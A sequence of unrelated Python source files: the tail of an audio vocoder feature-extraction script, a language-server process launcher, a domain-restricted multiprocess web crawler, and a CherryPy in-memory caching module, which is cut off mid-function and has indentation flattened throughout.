time_axis_range, f0_range, spc_range, ap_range = analyze_range(x, fs=fs, minf0=args.minf0, \
maxf0=args.maxf0, fperiod=args.shiftms, fftl=args.fftl)
else:
logging.info('open spk')
time_axis_range, f0_range, spc_range, ap_range = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0_range", f0_range)
write_hdf5(hdf5name, "/time_axis", time_axis_range)
melmagsp = melsp(x, n_mels=args.mel_dim, n_fft=args.fftl, shiftms=args.shiftms, winms=args.winms, fs=fs)
logging.info(melmagsp.shape)
write_hdf5(hdf5name, "/log_1pmelmagsp", np.log(1+10000*melmagsp))
uv_range, cont_f0_range = convert_continuos_f0(np.array(f0_range))
unique, counts = np.unique(uv_range, return_counts=True)
logging.info(dict(zip(unique, counts)))
cont_f0_lpf_range = \
low_pass_filter(cont_f0_range, int(1.0 / (args.shiftms * 0.001)), cutoff=20)
mcep_range = ps.sp2mc(spc_range, args.mcep_dim, args.mcep_alpha)
npow_range = spc2npow(spc_range)
_, spcidx_range = extfrm(mcep_range, npow_range, power_threshold=args.pow)
codeap_range = pw.code_aperiodicity(ap_range, fs)
cont_f0_lpf_range = np.expand_dims(cont_f0_lpf_range, axis=-1)
uv_range = np.expand_dims(uv_range, axis=-1)
unique, counts = np.unique(uv_range, return_counts=True)
logging.info(dict(zip(unique, counts)))
feat_orglf0 = np.c_[uv_range,np.log(cont_f0_lpf_range),codeap_range,mcep_range]
logging.info(feat_orglf0.shape)
write_hdf5(hdf5name, "/feat_org_lf0", feat_orglf0)
write_hdf5(hdf5name, "/spcidx_range", spcidx_range)
logging.info(hdf5name)
n_codeap = codeap_range.shape[-1]
for i in range(n_codeap):
logging.info('codeap: %d' % (i+1))
uv_codeap_i, cont_codeap_i = convert_continuos_codeap(np.array(codeap_range[:,i]))
cont_codeap_i = np.log(-np.clip(cont_codeap_i, a_min=np.amin(cont_codeap_i), a_max=MAX_CODEAP))
if i > 0:
cont_codeap = np.c_[cont_codeap, np.expand_dims(cont_codeap_i, axis=-1)]
else:
uv_codeap = np.expand_dims(uv_codeap_i, axis=-1)
cont_codeap = np.expand_dims(cont_codeap_i, axis=-1)
uv_codeap_i = np.expand_dims(uv_codeap_i, axis=-1)
unique, counts = np.unique(uv_codeap_i, return_counts=True)
logging.info(dict(zip(unique, counts)))
logging.info((uv_range==uv_codeap_i).all())
logging.info((uv_codeap==uv_codeap_i).all())
logging.info(uv_codeap.shape)
logging.info(cont_codeap.shape)
feat_mceplf0cap = np.c_[uv_range, np.log(cont_f0_lpf_range), uv_codeap, cont_codeap, mcep_range]
logging.info(feat_mceplf0cap.shape)
write_hdf5(hdf5name, "/feat_mceplf0cap", feat_mceplf0cap)
n_frame += feat_orglf0.shape[0]
if max_frame < feat_orglf0.shape[0]:
max_frame = feat_orglf0.shape[0]
if max_spc_frame < spcidx_range[0].shape[0]:
max_spc_frame = spcidx_range[0].shape[0]
if args.highpass_cutoff != 0 and args.wavfiltdir is not None:
sf.write(args.wavfiltdir + "/" + os.path.basename(wav_name), x, fs, 'PCM_16')
wavpath = args.wavdir + "/" + os.path.basename(wav_name)
logging.info("cpu-"+str(cpu+1)+" "+wavpath)
sp_rec = ps.mc2sp(mcep_range, args.mcep_alpha, args.fftl)
wav = np.clip(pw.synthesize(f0_range, sp_rec, ap_range, fs, frame_period=args.shiftms), \
-1, 1)
logging.info(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
recmagsp = np.matmul(melfb_t, melmagsp.T)
hop_length = int((args.fs/1000)*args.shiftms)
win_length = int((args.fs/1000)*args.winms)
wav = np.clip(librosa.core.griffinlim(recmagsp, hop_length=hop_length, win_length=win_length, window='hann'), -1, 1)
wavpath = args.wavgfdir + "/" + os.path.basename(wav_name)
logging.info(wavpath)
sf.write(wavpath, wav, fs, 'PCM_16')
else:
time_axis, f0, spc, ap = analyze(x, fs=fs, fperiod=args.shiftms, fftl=args.fftl)
write_hdf5(hdf5name, "/f0", f0)
npow = spc2npow(spc)
write_hdf5(hdf5name, "/npow", npow)
n_frame += f0.shape[0]
if max_frame < f0.shape[0]:
max_frame = f0.shape[0]
count += 1
arr[0] += n_wav
arr[1] += n_sample
arr[2] += n_frame
max_frame_list.append(max_frame)
max_spc_frame_list.append(max_spc_frame)
if (n_wav > 0):
logging.info(str(arr[0])+" "+str(n_wav)+" "+str(arr[1])+" "+str(n_sample/n_wav)+" "+\
str(arr[2])+" "+str(n_frame/n_wav)+" max_frame = "+str(max_frame)+" max_spc_frame = "+str(max_spc_frame))
    # divide list
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
for i in range(len(file_lists)):
logging.info('cpu-%d %d' % (i+1, len(file_lists[i])))
logging.info(file_lists[i])
# multi processing
with mp.Manager() as manager:
processes = []
arr = mp.Array('d', 3)
max_frame_list = manager.list()
max_spc_frame_list = manager.list()
i = 0
for f in file_lists:
p = mp.Process(target=feature_extract, args=(i, f,arr,max_frame_list,max_spc_frame_list))
p.start()
processes.append(p)
i += 1
# wait for all process
for p in processes:
p.join()
logging.info(str(arr[0])+" "+str(arr[1])+" "+str(arr[1]/arr[0])+" "+str(arr[2])+" "+str(arr[2]/arr[0]))
logging.info('max_frame: %ld' % (np.max(max_frame_list)))
logging.info('max_spc_frame: %ld' % (np.max(max_spc_frame_list)))
if __name__ == "__main__":
main()
|
process.py
|
from .logging import debug, exception_log, server_log
import subprocess
import os
import shutil
import threading
try:
from typing import Any, List, Dict, Tuple, Callable, Optional, Union, IO
assert Any and List and Dict and Tuple and Callable and Optional and Union and IO
except ImportError:
pass
def add_extension_if_missing(server_binary_args: 'List[str]') -> 'List[str]':
if len(server_binary_args) > 0:
executable_arg = server_binary_args[0]
fname, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
executable_arg = executable_arg + extension
updated_args = [executable_arg]
updated_args.extend(server_binary_args[1:])
return updated_args
return server_binary_args
def start_server(server_binary_args: 'List[str]', working_dir: str,
env: 'Dict[str,str]', attach_stderr: bool) -> 'Optional[subprocess.Popen]':
si = None
if os.name == "nt":
server_binary_args = add_extension_if_missing(server_binary_args)
si = subprocess.STARTUPINFO() # type: ignore
si.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
debug("starting " + str(server_binary_args))
stderr_destination = subprocess.PIPE if attach_stderr else subprocess.DEVNULL
return subprocess.Popen(
server_binary_args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=stderr_destination,
cwd=working_dir,
env=env,
startupinfo=si)
def attach_logger(process: 'subprocess.Popen', stream: 'IO[Any]') -> None:
threading.Thread(target=log_stream, args=(process, stream)).start()
def log_stream(process: 'subprocess.Popen', stream: 'IO[Any]') -> None:
"""
Reads any errors from the LSP process.
"""
running = True
while running:
running = process.poll() is None
try:
content = stream.readline()
if not content:
break
try:
decoded = content.decode("UTF-8")
except UnicodeDecodeError:
# todo: do we still need this ?
decoded = content # type: ignore
server_log(decoded.strip())
except IOError as err:
exception_log("Failure reading stream", err)
return
debug("LSP stream logger stopped.")
|
crawler.py
|
import logging
import time
import re
import urllib.parse
from queue import Empty
from multiprocessing import Process, Event
from queue import Queue as Queue
from multiprocessing import Queue as MPQueue
from threading import Thread
from enum import Enum
# Used to enable launch as a main
import os.path, sys
sys.path.insert(0, os.path.abspath('.'))
from webmining.html5wrapper import HTML5Wrapper
from webmining.seed import Seed, SeedElement
from webmining.fetcher import Fetcher, Timeout
from webmining.website import Website
from webmining.meta_extractor import MetaExtractor, MetaExtractionException
from webmining import LIB_PATH
__author__ = "https://github.com/MinistereSupRecherche"
__email__ = "github@recherche.gouv.fr"
__status__ = "dev"
PAGE_SIZE_LIMIT = 300000
class CrawlMode(Enum):
#crawling an entire domain
entire = "entire"
#crawling a subdomain
subpath = "subpath"
#crawling a single page
single = "single"
class Crawler:
"""
A generic crawler.
"""
def __init__(self, filename=None, seedlist=None, debug=False, proxy=None, multiproc=True,
mode=CrawlMode.entire, max_page_size=PAGE_SIZE_LIMIT):
"""
:param filename: path to the seed file
:param mode: crawling mode, either "entire", "single", "subpath"
"""
self.seed = None
self.debug = debug
# init the fetcher with a download limit size
self.fetcher = Fetcher(proxy, max_page_size=max_page_size)
self.htmltools = HTML5Wrapper()
self.crawl_depth = 0 # Do we crawl domains outside the seed
self.domain_depth = 0 # At which depth each seed element must be crawled
self.page_limit = 0 # Max amount of pages to be crawled
self.max_page_size = max_page_size
self.website = Website()
self.me = MetaExtractor(proxy=proxy)
self.badextensions = set(["pdf", "xls", "doc", "ppt", "rtf", "odt", "zip", "tar.gz", "tar", "exe", \
"jpg", "png", "jpeg", "bmp", "gif", "mp3", "flv", "rar", "ogv", "avi", "mp4", \
"mkg", "ps", "ogg", "webm", "ogm", "pps", "pptx", "docx", "xlsx", "mpg", "mov", \
"mkv", "mpeg", "m4v", "iso"])
self.crawling_process_over = False
# Logging initialization
self.logger = logging.getLogger("webmining:crawler")
self.logger.setLevel(logging.INFO)
if debug:
self.logger.setLevel(logging.DEBUG)
self.filename = filename
self.seedlist = seedlist
self.mode = mode
self.authorized_domains = set()
def _monitore_processes(self, processes):
"""
Checks if subcrawling processes are over.
This method is meant to be used wrapped into a Thread.
"""
for p in processes:
p["event"].wait()
self.crawling_process_over = True
def spawn_crawl_processes(self, html2txt, metas, proc, wait_courtesy):
processes = []
for i in range(0, proc):
e = Event()
p = Process(None, self._sub_crawl, None, (), {"queue": self.seed.q, "storage": self.storage, "end_event": e, \
"wait": wait_courtesy, "html2txt": html2txt, "metas": metas})
p.start()
processes.append({"proc": p, "event": e, "id": i})
monitor = Thread(group=None, target=self._monitore_processes, name=None, args=(),
kwargs={"processes": processes})
monitor.start()
while not self.crawling_process_over:
# If all processes are over, or if getting an element
# from queue takes more than timeout seconds (which seems empirically abnormal)
# then crawl is finished.
c = 0
for p in processes:
if not p["proc"].is_alive():
c += 1
if c >= len(processes):
self.logger.warning("All processes are dead !")
break
try:
el = self.storage.get(block=True, timeout=5)
yield el
except Empty:
if self.storage.empty():
pass
self.logger.debug("joining processes...")
for p in processes:
if p["proc"].is_alive():
p["proc"].terminate()
p["proc"].join()
# Finally, joining monitoring thread
monitor.join(3)
if monitor.is_alive():
monitor._stop()
def crawl(self, proc=None, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False,
metas=None):
"""
:param proc: amount of processes to spawn, 0 or None can be used to exploit the current process
:param domain_depth: crawling depth for each seed element (inside original domain)
:param crawl_depth: crawling depth for each seed element (outside original domain)
:param page_limit: max amount of page to crawl
:param wait_courtesy: time in second between each fetch
        :param html2txt: resulting pages must be raw html (default), or cleaned text
:param metas: metas we want to extract during crawling
"""
self.domain_depth = domain_depth
self.crawl_depth = crawl_depth
self.page_limit = page_limit
# lazy loading, to know if we need to implement seeds with multiproc or not
if self.seed is None:
if self.filename is not None:
self.seed = Seed(f=self.filename, multiproc=not (proc is None or proc == 0))
elif self.seedlist is not None:
self.seed = Seed(s=self.seedlist, multiproc=not (proc is None or proc == 0))
if proc is None or proc == 0:
self.storage = Queue() # Will contain shared crawl results
self._sub_crawl(self.seed.q, self.storage, Event(), wait_courtesy, html2txt, metas, None)
while True:
try:
el = self.storage.get(block=False)
yield el
except Empty:
break
else:
self.storage = MPQueue() # Will contain shared crawl results
yield from self.spawn_crawl_processes(html2txt, metas, proc, wait_courtesy)
def _sub_crawl(self, queue, storage, end_event, wait, html2txt, metas, block_timeout=5):
"""
This private method will be wrapped into a process,
and is in charge of dequeuing seed elements, and recording results into
the storage.
"""
while True:
se = None
pages = []
try:
se = queue.get(block=block_timeout is not None, timeout=block_timeout)
except Empty:
end_event.set()
return
self.logger.info("Launched crawl [%s]" % se.url)
start_url = se.url # Need to keep it as it may change due to redirect
pages = self.crawl_domain(se, self.domain_depth, wait, html2txt, self.page_limit, self.mode)
self.logger.info("Crawl over with %d pages [%s]"
% (len(pages), (se.url if start_url in se.url else '%s -> %s' % (start_url, se.url))))
first = True
for url in pages:
se = pages[url]
ext_metas = {}
# Extract asked metas from page
if metas is not None:
try:
ext_metas = self.me.extract(metas, se.html, se.relevant_txt, \
url=url, firstpage=first)
first = False
except MetaExtractionException as e:
self.logger.warning("Impossible to extract metas in [%s]: " % url)
self.logger.warning(e)
continue
for m in ext_metas:
if ext_metas[m] is not None:
if m not in se.metas.keys():
if m in ["contact", "phone", "fax"]:
se.metas[m] = []
else:
se.metas[m] = set()
if m in ["contact", "phone", "fax"]:
se.metas[m].extend(ext_metas[m])
else:
se.metas[m].add(ext_metas[m])
storage.put(se)
# Let's save memory
del pages
if self.crawl_depth > 0:
# TODO: create new seed elements to put in queue when crawl deeper than 0
# with an updated depth, domain, etc...
raise Exception("Not implemented")
def _check_first_page(self, dom, url):
"""
Checks if domain first page is
- a html redirection
- a frameset
returns an url to follow, or None if nothing detected.
"""
# we check out if it contains a <meta http-equiv="refresh"
# ex. <meta http-equiv="Refresh" content="0; URL=corporate-finance/corporate-finance-presentation.html">
metas = dom("meta[http-equiv='refresh'][content], meta[http-equiv='Refresh'][content], meta[http-equiv='REFRESH'][content]")
#raise Exception("type of metas : " + str(type(metas)) + "\n" + str(dir(metas)))
base_url = self._get_base_url(dom, url)
for m in metas.items():
content = m.attr.content
m = re.search("url\s?=\s?(.*?)\s", content + ' ', flags=re.I)
if m is not None:
rurl = m.group(1).strip()
rurl = urllib.parse.urljoin(base_url, rurl)
self.logger.info("HTTP redirection to [%s]" % rurl)
return rurl
# We check out if it contains a <frame src="..."
# and only return first found url if true
# TODO: is it relevant to return only the first frame?
frames = dom("frame[src]")
for f in frames.items():
rurl = urllib.parse.urljoin(base_url, f.attr.src)
self.logger.info("FRAME redirection to [%s]" % rurl)
return rurl
# We check out if it contains a JS redirection document.location.href=
# and only return first found url if true
scripts = dom("script")
for s in scripts.items():
js = s.text()
if js is not None:
m = re.search("document.location.href\s?=\s?[\"']([^\"]*?)[\"']\s*[^+]", js + " ", flags=re.I)
if m is not None:
rurl = urllib.parse.urljoin(base_url, m.group(1).strip())
self.logger.info("JavaScript redirection to [%s]" % rurl)
return rurl
return None
def _verify_and_parse_result(self, fresult, seed_el):
"""
Verify if a fetch result is valid for parsing. If so, it will build the pq element that correspond to the webpage
:param fresult: FetchResult object
:param seed_el: SeedElement object
:return: The pq element that correspond
"""
if fresult is None:
return None
html = fresult.webpage
content_type = fresult.content_type
# in case of 300/302 we use final url given by fetcher
seed_el.url = fresult.fetched_url
if fresult.http_status is None or fresult.http_status != 200:
self.logger.warning("Bad HTTP Status (%s) for [%s]" % (str(fresult.http_status), seed_el.url))
return None
if html is None:
self.logger.warning("Impossible to crawl [%s]" % seed_el.url)
            # Missed page is not ignored, as this kind of website can be dangerous
return None
# We only want to compute text/html webpages
if content_type is not None and "text/html" not in content_type.lower():
self.logger.info("Content Type ignored : " + str(content_type) + " [" + seed_el.url + "]")
return None
# Too large file
self.logger.debug("Page size of %d characters" % len(html))
if len(html) > self.max_page_size:
self.logger.warning("Page ignored, too big (%d characters) in %s" % (len(html), seed_el.url))
return None
# Is an attachment, so we must ignore it
if fresult.attachment is not None:
self.logger.warning(
"Page ignored, because it correspond to the attachment %s [%s]" % (fresult.attachment, seed_el.url))
return None
if len(html) == 0:
self.logger.warning("Page ignored because it is empty [%s]" % seed_el.url)
return None
try:
dom = self.htmltools.pq(html)
except Exception as e:
self.logger.warning("Impossible to parse html url=%s : %s" % (fresult.fetched_url, str(e)))
return None
# DEACTIVATED FEATURE
# Test to see if the root node is a html node
# if dom[0].tag.lower() != 'html':
# self.logger.warning("Page is not a valid html [%s]" % seed_el.url)
# return None
return dom
@staticmethod
def _generate_authorized_domains(domain):
domain = domain.lower() # Force lower case
auth = set([domain])
if "www." in domain:
auth.add(domain.replace("www.", ""))
else:
auth.add("www." + domain)
comdom = {dom.rsplit(".", maxsplit=1)[0] + ".com" for dom in auth if ".com" not in dom}
auth.update(comdom)
return auth
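    @staticmethod
    def _example_authorized_domains():
        # Hedged illustration (not part of the original crawler): the helper
        # above expands a seed's netloc into its www/bare variants plus their
        # ".com" counterparts, which form the whitelist used during a crawl.
        domains = Crawler._generate_authorized_domains("www.example.fr")
        assert domains == {"www.example.fr", "example.fr",
                           "www.example.com", "example.com"}
        return domains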
def _is_authorized_subpath(self, init_url, target_url):
# Force Lower case
init_url = init_url.lower() if init_url is not None else init_url
target_url = target_url.lower() if target_url is not None else target_url
init_path = urllib.parse.urlparse(init_url).path
target_url_parsed = urllib.parse.urlparse(target_url)
target_domain, target_path = target_url_parsed.netloc, target_url_parsed.path
if target_domain in self.authorized_domains and target_path.startswith(init_path):
return True
return False
def crawl_domain(self, init_seed_el, max_dom_depth, wait, html2txt, limit=None, mode=CrawlMode.entire):
"""
Fetches a domain, and then crawls its internal pages until given depth.
Returns a dictionary of url -> html code.
"""
pages = {}
visited = set() # Already visited URLs
found_links = [init_seed_el] # List of found links as SeedElements, waiting to be fetched
        # overrides the limit to crawl only one page
if mode == CrawlMode.single:
limit = 1
max_dom_depth = 1
self.logger.info("Launching crawl in the %s mode" % mode.value)
# -- Managing authorized domains for this crawl --
domain = urllib.parse.urlparse(init_seed_el.url).netloc
self.authorized_domains = self._generate_authorized_domains(domain)
self.logger.info("Authorized domains for this crawl : %s" % str(self.authorized_domains))
# Looping through found urls
while True:
if limit is not None and len(visited) > limit:
self.logger.info("Max amount of pages reached ! (%d)" % limit)
return pages
self.logger.debug("%d url visited so far" % len(visited))
seed_el = None # Current element being computed, in while loop
try:
while True:
seed_el = found_links.pop(0)
if seed_el.url not in visited:
break
visited.add(seed_el.url) # A popped element is considered visited
except IndexError:
self.logger.info("No more links to visit for this website.")
return pages
# Fetching URL given in seed element in param
self.logger.debug("Fetching " + seed_el.url)
fresult = None
retry = 0
max_retry = 2 # TODO - VYS - Make this configurable
while fresult is None and retry <= max_retry:
try:
fresult = self.fetcher.fetch(seed_el.url, self.debug, timeout=10)
# If we're here it means that no more retry are needed, disable it
retry = max_retry + 1
except Timeout:
self.logger.warning("Timeout while fetching %s%s" % (
seed_el.url, (", lets retry (max retry %s)" % max_retry) if retry == 0 else (
" - retry %s/%s" % (retry, max_retry))))
retry += 1
continue
if fresult is None:
continue
if wait > 0:
time.sleep(wait)
# Lets do a quick check if we don't get a redirect
rurl30X = None
if fresult.fetched_url != seed_el.url:
rurl30X = fresult.fetched_url
self.logger.warning("Got a redirect to %s when fetching %s" % (fresult.fetched_url, seed_el.url))
dom = self._verify_and_parse_result(fresult, seed_el)
if dom is None:
self.logger.warning("Found no DOM for %s" % seed_el.url)
continue
# normalize root urls to avoid a double visit at http://www.example.com/ and http://www.example.com
path = urllib.parse.urlparse(seed_el.url).path
if path == '':
seed_el.url += '/'
self.logger.debug("Fetched [%s] " % seed_el.url)
# If this page is the first one for this domain,
# we check out if it contains a <meta http-equiv="refresh"
# The same if this page is the second one,
# because sometimes a redirection is followed by a frame
if len(visited) < 2:
rurl = self._check_first_page(dom, seed_el.url)
rurl = rurl if rurl is not None else rurl30X
if rurl is not None:
domain = urllib.parse.urlparse(rurl).netloc
domain = domain.lower()
# If we are following a redirect, we also add it to the set of authorized domains
# to be able to follow next urls.
self.authorized_domains.add(domain)
if "www." in domain:
self.authorized_domains.add(domain.replace("www.", ""))
else:
self.authorized_domains.add("www." + domain)
self.logger.info("New authorized domains for this crawl : %s" % str(self.authorized_domains))
if seed_el.url in visited:
pass
else:
visited.add(seed_el.url)
# Adding detected url to follow
ser = SeedElement(rurl, seed_el.groupid)
ser.depth = seed_el.depth + 1
found_links.append(ser)
# If the new page url, after redirections, is outside authorized domains, don't use it
if urllib.parse.urlparse(seed_el.url).netloc.lower() not in self.authorized_domains:
self.logger.warning("redirection to %s don't exits from authorized domains, page not analyzed" % seed_el.url)
continue
if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, seed_el.url):
self.logger.warning("subpath mode: redirection to %s exists from authorized subpaths, page not analyzed" % seed_el.url)
continue
# ---
# HTML computing
# ---
# Converting html into "clean" and interesting text
relevant_txt = self.website.extract_meaningful_text(dom)
# Builds a new Seed Element from popped element
se = SeedElement(seed_el.url, seed_el.groupid)
se.depth = seed_el.depth
se.relevant_txt = relevant_txt
if fresult is not None:
se.html = fresult.webpage
se.content_type = fresult.content_type
se.charset = fresult.charset
se.http_status = fresult.http_status
se.headers = fresult.headers
# Sometimes DOM is too deep to extract title properly
se.title = self.website.extract_title(dom)
pages[seed_el.url] = se
visited.add(seed_el.url) # May differ from the original URL because of redirections
# This page has been computed, let's now extract its links
# if max depth has not been reached
if seed_el.depth + 1 > max_dom_depth:
continue
if mode != CrawlMode.single:
found_links.extend(self._extract_links(dom, init_seed_el, seed_el, visited, mode))
self.logger.debug("Out of while loop.")
return pages
def _get_base_url(self, dom, url):
# check if there is a 'base' tag for link compute
base_url = dom('base').attr('href')
if base_url is None:
base_url = url
return base_url
def _extract_links(self, dom, init_seed_el, seed_el, visited, mode):
"""
Given a dom, extract internal links to crawl
"""
# ---
# Link extraction and checking
# ---
links = {}
selected_links = []
added = set()
# DOM is sometimes too deep to extract links properly
try:
links = self.htmltools.extract_doc_links(dom)
except Exception as e:
links = {}
self.logger.warning("Impossible to extract links from %s : %s" % (seed_el.url, str(e)))
base_url = self._get_base_url(dom, seed_el.url)
for key in links:
# We do not want anchors to be crawled
key = key.split("#")[0]
if len(key) < 1:
continue
url = None
try:
url = urllib.parse.urljoin(base_url, key)
except Exception as e:
# Invalid url, ignoring
self.logger.warning("Invalid urljoin (%s,%s): %s" % (base_url, key, str(e)))
continue
# Trying to get eventual file extension, and to check its validity
path = urllib.parse.urlparse(url).path
if path == '':
url += '/'
else:
ext = path.split('.')[-1].strip().lower()
if ext in self.badextensions:
self.logger.debug("Bad extension [%s] in %s" % (ext, url))
continue
# Let's check if it's an internal link, and not an outgoing one
if urllib.parse.urlparse(url).netloc.lower() in self.authorized_domains and \
url not in visited and url not in added:
if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, url):
continue
se = SeedElement(url, seed_el.groupid)
se.depth = seed_el.depth + 1
selected_links.append(se)
added.add(url)
return selected_links
# for testing purposes
if __name__ == "__main__":
logging.basicConfig(level=logging.WARNING,
format='[%(levelname)s][%(name)s][%(asctime)s] %(message)s')
# def crawl(self, storage, proc=1, domain_depth=0, crawl_depth=0):
c = Crawler(LIB_PATH + "resources/testseed.txt")
count = 0
# def crawl(self, proc=1, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None):
for se in c.crawl(proc=2, domain_depth=2, crawl_depth=0, page_limit=80, wait_courtesy=0.1):
# print(se)
count += 1
print("%d elements have been crawled !" % count)
|
caching.py
|
import datetime
import threading
import time
import cherrypy
from cherrypy.lib import cptools, httputil
class Cache(object):
def get(self):
raise NotImplementedError
def put(self, obj, size):
raise NotImplementedError
def delete(self):
raise NotImplementedError
def clear(self):
raise NotImplementedError
# ------------------------------- Memory Cache ------------------------------- #
class AntiStampedeCache(dict):
def wait(self, key, timeout=5, debug=False):
"""Return the cached value for the given key, or None.
If timeout is not None (the default), and the value is already
being calculated by another thread, wait until the given timeout has
elapsed. If the value is available before the timeout expires, it is
returned. If not, None is returned, and a sentinel placed in the cache
to signal other threads to wait.
If timeout is None, no waiting is performed nor sentinels used.
"""
value = self.get(key)
if isinstance(value, threading.Event):
if timeout is None:
# Ignore the other thread and recalc it ourselves.
if debug:
cherrypy.log('No timeout', 'TOOLS.CACHING')
return None
# Wait until it's done or times out.
if debug:
cherrypy.log('Waiting up to %s seconds' % timeout, 'TOOLS.CACHING')
value.wait(timeout)
if value.result is not None:
# The other thread finished its calculation. Use it.
if debug:
cherrypy.log('Result!', 'TOOLS.CACHING')
return value.result
# Timed out. Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('Timed out', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return None
elif value is None:
# Stick an Event in the slot so other threads wait
# on this one to finish calculating the value.
if debug:
cherrypy.log('No cached value, storing sentinel', 'TOOLS.CACHING')
e = threading.Event()
e.result = None
dict.__setitem__(self, key, e)
return value
def __setitem__(self, key, value):
"""Set the cached value for the given key."""
existing = self.get(key)
dict.__setitem__(self, key, value)
if isinstance(existing, threading.Event):
# Set Event.result so other threads waiting on it have
# immediate access without needing to poll the cache again.
existing.result = value
existing.set()
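# --- Illustrative sketch, not part of the original module ---
# Shows the anti-stampede protocol implemented above: the first caller gets
# None back (a sentinel Event is planted for it), computes the value and
# stores it; storing wakes up any other thread blocked in wait(). The key
# "page" and the string result are placeholders used only for illustration.
def _antistampede_demo():
    cache = AntiStampedeCache()
    value = cache.wait("page", timeout=1)
    if value is None:
        value = "expensive result"  # stand-in for a slow computation
        cache["page"] = value       # sets Event.result and releases waiters
    return value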
class MemoryCache(Cache):
"""An in-memory cache for varying response content.
Each key in self.store is a URI, and each value is an AntiStampedeCache.
The response for any given URI may vary based on the values of
"selecting request headers"; that is, those named in the Vary
response header. We assume the list of header names to be constant
for each URI throughout the lifetime of the application, and store
that list in self.store[uri].selecting_headers.
The items contained in self.store[uri] have keys which are tuples of request
header values (in the same order as the names in its selecting_headers),
and values which are the actual responses.
"""
maxobjects = 1000
maxobj_size = 100000
maxsize = 10000000
delay = 600
antistampede_timeout = 5
expire_freq = 0.1
debug = False
def __init__(self):
self.clear()
# Run self.expire_cache in a separate daemon thread.
t = threading.Thread(target=self.expire_cache, name='expire_cache')
self.expiration_thread = t
if hasattr(threading.Thread, "daemon"):
# Python 2.6+
t.daemon = True
else:
t.setDaemon(True)
t.start()
def clear(self):
"""Reset the cache to its initial, empty state."""
self.store = {}
self.expirations = {}
self.tot_puts = 0
self.tot_gets = 0
self.tot_hist = 0
self.tot_expires = 0
self.tot_non_modified = 0
self.cursize = 0
def expire_cache(self):
# expire_cache runs in a separate thread which the servers are
# not aware of. It's possible that "time" will be set to None
# arbitrarily, so we check "while time" to avoid exceptions.
# See tickets #99 and #180 for more information.
while time:
now = time.time()
# Must make a copy of expirations so it doesn't change size
# during iteration
for expiration_time, objects in list(self.expirations.items()):
if expiration_time <= now:
for obj_size, uri, sel_header_values in objects:
try:
del self.store[uri][sel_header_values]
self.tot_expires += 1
self.cursize -= obj_size
except KeyError:
# the key may have been deleted elsewhere
pass
del self.expirations[expiration_time]
time.sleep(self.expire_freq)
def get(self):
"""Return the current variant if in the cache, else None."""
request = cherrypy.serving.request
self.tot_gets += 1
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
return None
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
header_values.sort()
variant = uricache.wait(key=tuple(header_values),
timeout=self.antistampede_timeout,
debug=self.debug)
if variant is not None:
self.tot_hist += 1
return variant
def put(self, variant, size):
"""Store the current variant in the cache."""
request = cherrypy.serving.request
response = cherrypy.serving.response
uri = cherrypy.url(qs=request.query_string)
uricache = self.store.get(uri)
if uricache is None:
uricache = AntiStampedeCache()
uricache.selecting_headers = [
e.value for e in response.headers.elements('Vary')]
self.store[uri] = uricache
if len(self.store) < self.maxobjects:
total_size = self.cursize + size
# checks if there's space for the object
if (size < self.maxobj_size and total_size < self.maxsize):
# add to the expirations list
expiration_time = response.time + self.delay
bucket = self.expirations.setdefault(expiration_time, [])
bucket.append((size, uri, uricache.selecting_headers))
# add to the cache
header_values = [request.headers.get(h, '')
for h in uricache.selecting_headers]
header_values.sort()
uricache[tuple(header_values)] = variant
self.tot_puts += 1
self.cursize = total_size
def delete(self):
"""Remove ALL cached variants of the current resource."""
uri = cherrypy.url(qs=cherrypy.serving.request.query_string)
self.store.pop(uri, None)
def get(invalid_methods=("POST", "PUT", "DELETE"), debug=False, **kwargs):
"""Try to obtain cached output. If fresh enough, raise HTTPError(304).
If POST, PUT, or DELETE:
* invalidates (deletes) any cached response for this resource
* sets request.cached = False
* sets request.cacheable = False
else if a cached copy exists:
* sets request.cached = True
* sets request.cacheable = False
* sets response.headers to the cached values
* checks the cached Last-Modified response header against the
current If-(Un)Modified-Since request headers; raises 304
if necessary.
* sets response.status and response.body to the cached values
* returns True
otherwise:
* sets request.cached = False
* sets request.cacheable = True
* returns False
"""
request = cherrypy.serving.request
response = cherrypy.serving.response
if not hasattr(cherrypy, "_cache"):
# Make a process-wide Cache object.
cherrypy._cache = kwargs.pop("cache_class", MemoryCache)()
# Take all remaining kwargs and set them on the Cache object.
for k, v in kwargs.items():
setattr(cherrypy._cache, k, v)
cherrypy._cache.debug = debug
# POST, PUT, DELETE should invalidate (delete) the cached copy.
# See http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.10.
if request.method in invalid_methods:
if debug:
cherrypy.log('request.method %r in invalid_methods %r' %
(request.method, invalid_methods), 'TOOLS.CACHING')
cherrypy._cache.delete()
request.cached = False
request.cacheable = False
return False
if 'no-cache' in [e.value for e in request.headers.elements('Pragma')]:
request.cached = False
request.cacheable = True
return False
cache_data = cherrypy._cache.get()
request.cached = bool(cache_data)
request.cacheable = not request.cached
if request.cached:
# Serve the cached copy.
max_age = cherrypy._cache.delay
for v in [e.value for e in request.headers.elements('Cache-Control')]:
atoms = v.split('=', 1)
directive = atoms.pop(0)
if directive == 'max-age':
if len(atoms) != 1 or not atoms[0].isdigit():
raise cherrypy.HTTPError(400, "Invalid Cache-Control header")
max_age = int(atoms[0])
break
elif directive == 'no-cache':
if debug:
